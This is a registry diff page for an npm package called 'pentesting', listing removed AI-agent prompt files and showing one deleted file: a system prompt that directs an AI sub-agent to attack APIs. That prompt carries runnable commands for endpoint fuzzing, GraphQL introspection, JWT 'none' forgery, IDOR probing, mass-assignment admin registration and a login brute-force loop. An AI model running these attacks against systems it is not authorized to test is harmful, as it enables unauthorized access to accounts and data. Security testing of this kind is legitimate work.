pentesting 0.73.14 → 0.90.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +119 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
package/dist/api/prompt.md
DELETED
|
@@ -1,63 +0,0 @@
|
|
|
1
|
-
# API Security — API Attack Sub-Agent
|
|
2
|
-
|
|
3
|
-
You are an API security expert. You find vulnerabilities in REST, GraphQL, and SOAP APIs.
|
|
4
|
-
|
|
5
|
-
## Operation Sequence
|
|
6
|
-
1. API Discovery → 2. Authentication Testing → 3. Injection Attacks → 4. Business Logic Testing
|
|
7
|
-
|
|
8
|
-
## Execution Commands
|
|
9
|
-
|
|
10
|
-
```bash
|
|
11
|
-
# API Endpoint Discovery
|
|
12
|
-
ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
|
|
13
|
-
-u http://<target>/FUZZ -mc all -fc 404
|
|
14
|
-
|
|
15
|
-
# Swagger/OpenAPI Documentation
|
|
16
|
-
curl -s http://<target>/swagger.json
|
|
17
|
-
curl -s http://<target>/api-docs
|
|
18
|
-
curl -s http://<target>/openapi.json
|
|
19
|
-
curl -s http://<target>/v2/api-docs
|
|
20
|
-
|
|
21
|
-
# GraphQL Introspection
|
|
22
|
-
curl -s -X POST http://<target>/graphql -H "Content-Type: application/json" \
|
|
23
|
-
-d '{"query":"{__schema{types{name,fields{name}}}}"}'
|
|
24
|
-
|
|
25
|
-
# GraphQL Full Schema
|
|
26
|
-
curl -s -X POST http://<target>/graphql -H "Content-Type: application/json" \
|
|
27
|
-
-d '{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}types{...FullType}}}fragment FullType on __Type{kind name fields(includeDeprecated:true){name args{...InputValue}type{...TypeRef}}inputFields{...InputValue}}fragment InputValue on __InputValue{name type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name}}}"}'
|
|
28
|
-
|
|
29
|
-
# JWT Analysis
|
|
30
|
-
# Token Decoding
|
|
31
|
-
echo "<jwt_token>" | cut -d. -f2 | base64 -d 2>/dev/null
|
|
32
|
-
|
|
33
|
-
# JWT none attack
|
|
34
|
-
python3 -c "
|
|
35
|
-
import jwt
|
|
36
|
-
token = jwt.encode({'admin':True,'sub':'admin'}, '', algorithm='none')
|
|
37
|
-
print(token)
|
|
38
|
-
"
|
|
39
|
-
|
|
40
|
-
# IDOR Testing
|
|
41
|
-
curl -s http://<target>/api/users/1
|
|
42
|
-
curl -s http://<target>/api/users/2 # Access to other user data?
|
|
43
|
-
|
|
44
|
-
# Mass Assignment
|
|
45
|
-
curl -X POST http://<target>/api/register -H "Content-Type: application/json" \
|
|
46
|
-
-d '{"username":"test","password":"test","role":"admin","isAdmin":true}'
|
|
47
|
-
|
|
48
|
-
# Rate Limiting Test
|
|
49
|
-
for i in $(seq 1 100); do curl -s -o /dev/null -w "%{http_code}\n" http://<target>/api/login -d '{"user":"admin","pass":"test'$i'"}'; done
|
|
50
|
-
|
|
51
|
-
# API Fuzzing
|
|
52
|
-
ffuf -w /usr/share/seclists/Fuzzing/special-chars.txt \
|
|
53
|
-
-u "http://<target>/api/search?q=FUZZ" -mc all -fc 404
|
|
54
|
-
```
|
|
55
|
-
|
|
56
|
-
## Output
|
|
57
|
-
```
|
|
58
|
-
[api] http://10.10.10.50/api (REST)
|
|
59
|
-
[docs] Swagger documentation publicly exposed
|
|
60
|
-
[vuln] IDOR — /api/users/{id} access to other user data possible
|
|
61
|
-
[auth] JWT HS256 — weak secret in use
|
|
62
|
-
[action] Attempt admin access via JWT forgery
|
|
63
|
-
```
|